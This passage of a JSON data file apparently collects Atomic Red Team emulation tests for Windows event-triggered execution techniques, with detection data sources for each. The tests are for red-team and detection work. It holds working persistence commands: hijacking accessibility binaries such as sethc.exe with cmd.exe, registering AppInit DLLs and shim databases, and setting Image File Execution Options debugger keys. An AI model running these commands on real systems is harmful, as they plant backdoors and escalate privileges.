$registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "source": "atomics/T1546.008/T1546.008.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Accessibility Features" + }, + { + "command": "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"C:\\windows\\system32\\cmd.exe\"\nForeach ($item in $input_table){\n $item = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "source": "atomics/T1546.008/T1546.008.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Accessibility Features" + }, + { + "command": "copy C:\\Windows\\System32\\sethc.exe C:\\Windows\\System32\\sethc_backup.exe\ntakeown /F C:\\Windows\\System32\\sethc.exe /A\nicacls C:\\Windows\\System32\\sethc.exe /grant Administrators:F /t\ncopy /Y C:\\Windows\\System32\\cmd.exe C:\\Windows\\System32\\sethc.exe\n", + "source": "atomics/T1546.008/T1546.008.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Accessibility Features" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.008", + "display_name": "Event Triggered Execution: Accessibility Features", + "atomic_tests": [ + { + "name": "Attaches Command Prompt as a Debugger to a List of Target Processes", + "auto_generated_guid": "3309f53e-b22b-4eb6-8fd2-a6cf58b355a9", + "description": "Attaches cmd.exe to a list of 
processes. Configure your own Input arguments to a different executable or list of executables.\n\nUpon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "parent_list": { + "description": "Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: \"osk.exe\"\n", + "type": "String", + "default": "osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe" + }, + "attached_process": { + "description": "Full path to process to attach to target in #{parent_list}. Default: cmd.exe\n", + "type": "Path", + "default": "C:\\windows\\system32\\cmd.exe" + } + }, + "executor": { + "command": "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"#{attached_process}\"\nForeach ($item in $input_table){\n $item = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "cleanup_command": "$input_table = \"#{parent_list}\".split(\",\")\nForeach ($item in $input_table)\n{\n $item = $item.trim()\n reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\" /v Debugger /f 2>&1 | Out-Null\n}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Replace binary of sticky keys", + "auto_generated_guid": "934e90cf-29ca-48b3-863c-411737ad44e3", + "description": "Replace sticky keys binary (sethc.exe) with cmd.exe\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy C:\\Windows\\System32\\sethc.exe 
C:\\Windows\\System32\\sethc_backup.exe\ntakeown /F C:\\Windows\\System32\\sethc.exe /A\nicacls C:\\Windows\\System32\\sethc.exe /grant Administrators:F /t\ncopy /Y C:\\Windows\\System32\\cmd.exe C:\\Windows\\System32\\sethc.exe\n", + "cleanup_command": "copy /Y C:\\Windows\\System32\\sethc_backup.exe C:\\Windows\\System32\\sethc.exe\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + 
"Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed 
through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.010", + "command_list": [ + "reg.exe import PathToAtomicsFolder\\T1546.010\\src\\T1546.010.reg\n", + "reg.exe import #{registry_file}\n" + ], + "commands": [ + { + "command": "reg.exe import PathToAtomicsFolder\\T1546.010\\src\\T1546.010.reg\n", + "source": "atomics/T1546.010/T1546.010.yaml", + "name": "Atomic Red Team 
Test - Event Triggered Execution: AppInit DLLs" + }, + { + "command": "reg.exe import #{registry_file}\n", + "source": "atomics/T1546.010/T1546.010.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: AppInit DLLs" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.010", + "display_name": "Event Triggered Execution: AppInit DLLs", + "atomic_tests": [ + { + "name": "Install AppInit Shim", + "auto_generated_guid": "a58d9386-3080-4242-ab5f-454c16503d18", + "description": "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, \nyou will see the message \"The operation completed successfully.\" Each time the DLL is loaded, you will see a message box with a message of \"Install AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the \nAppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.\n\nNote: If secure boot is enabled, this technique will not work. 
https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "registry_file": { + "description": "Windows Registry File", + "type": "Path", + "default": "PathToAtomicsFolder\\T1546.010\\src\\T1546.010.reg" + }, + "registry_cleanup_file": { + "description": "Windows Registry File", + "type": "Path", + "default": "PathToAtomicsFolder\\T1546.010\\src\\T1546.010-cleanup.reg" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file})\n", + "prereq_command": "if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg\" -OutFile \"#{registry_file}\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg\" -OutFile \"#{registry_cleanup_file}\"\n" + }, + { + "description": "DLL's must exist in the C:\\Tools directory (T1546.010.dll and T1546.010x86.dll)\n", + "prereq_command": "if ((Test-Path c:\\Tools\\T1546.010.dll) -and (Test-Path c:\\Tools\\T1546.010x86.dll)) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory C:\\Tools -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll\" -OutFile C:\\Tools\\T1546.010.dll\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll\" -OutFile C:\\Tools\\T1546.010x86.dll\n" + } + ], + "executor": { + "command": "reg.exe import 
#{registry_file}\n", + "cleanup_command": "reg.exe import #{registry_cleanup_file} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + 
"data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can 
be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1546.011", + "command_list": [ + "sdbinst.exe PathToAtomicsFolder\\T1546.011\\bin\\AtomicShimx86.sdb\n", + "Copy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb 
C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", + "New-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\nNew-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\n" + ], + "commands": [ + { + "command": "sdbinst.exe PathToAtomicsFolder\\T1546.011\\bin\\AtomicShimx86.sdb\n", + "source": "atomics/T1546.011/T1546.011.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Application Shimming" + }, + { + "command": "Copy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", + "source": "atomics/T1546.011/T1546.011.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Application Shimming" + }, + { + "command": "New-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\nNew-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\n", + "source": "atomics/T1546.011/T1546.011.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Application Shimming" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.011", + "display_name": "Event Triggered Execution: Application Shimming", + "atomic_tests": [ + { + "name": "Application Shim Installation", + "auto_generated_guid": 
"9ab27e22-ee62-4211-962b-d36d9a0e6a18", + "description": "Install a shim database. This technique is used for privilege escalation and bypassing user access control.\nUpon execution, \"Installation of AtomicShim complete.\" will be displayed. To verify the shim behavior, run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" as defined in the AtomicTest.dll. To better understand what is happening, review\nthe source code files is the \\\\T1546.011\\\\src directory.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "Path to the shim database file", + "type": "String", + "default": "PathToAtomicsFolder\\T1546.011\\bin\\AtomicShimx86.sdb" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Shim database file must exist on disk at specified location (#{file_path})\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb\" -OutFile \"#{file_path}\"\n" + }, + { + "description": "AtomicTest.dll must exist at c:\\Tools\\AtomicTest.dll\n", + "prereq_command": "if (Test-Path c:\\Tools\\AtomicTest.dll) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path c:\\Tools\\AtomicTest.dll) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll\" -OutFile c:\\Tools\\AtomicTest.dll\n" + } + ], + "executor": { + "command": "sdbinst.exe #{file_path}\n", + "cleanup_command": "sdbinst.exe -u #{file_path} >nul 2>&1\n", + "name": "command_prompt", + 
"elevation_required": true + } + }, + { + "name": "New shim database files created in the default shim database directory", + "auto_generated_guid": "aefd6866-d753-431f-a7a4-215ca7e3f13d", + "description": "Upon execution, check the \"C:\\Windows\\apppatch\\Custom\\\" folder for the new shim database\n\nhttps://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", + "cleanup_command": "Remove-Item C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb -ErrorAction Ignore\nRemove-Item C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Registry key creation and/or modification events for SDB", + "auto_generated_guid": "9b6a06f9-ab5e-4e8d-8289-1df4289db02f", + "description": "Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing\nthe registry keys that were created. 
These keys can also be viewed using the Registry Editor.\n\nhttps://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "New-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\nNew-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\n", + "cleanup_command": "Remove-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\" -Name \"AtomicRedTeamT1546.011\" -ErrorAction Ignore\nRemove-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\" -Name \"AtomicRedTeamT1546.011\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": 
"Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows 
registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "file", + 
"definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.012", + "command_list": [ + "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\calc.exe\" /v Debugger /d \"#{payload_binary}\"\n", + "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /d \"C:\\Windows\\System32\\cmd.exe\"\n", + "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v MonitorProcess /d \"#{payload_binary}\"\n", + "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v MonitorProcess /d \"C:\\Windows\\System32\\cmd.exe\"\n" + ], + "commands": [ + { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\calc.exe\" /v Debugger /d \"#{payload_binary}\"\n", + "source": "atomics/T1546.012/T1546.012.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Image File Execution Options Injection" + }, + { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /d \"C:\\Windows\\System32\\cmd.exe\"\n", + "source": "atomics/T1546.012/T1546.012.yaml", + "name": "Atomic Red Team Test - Event 
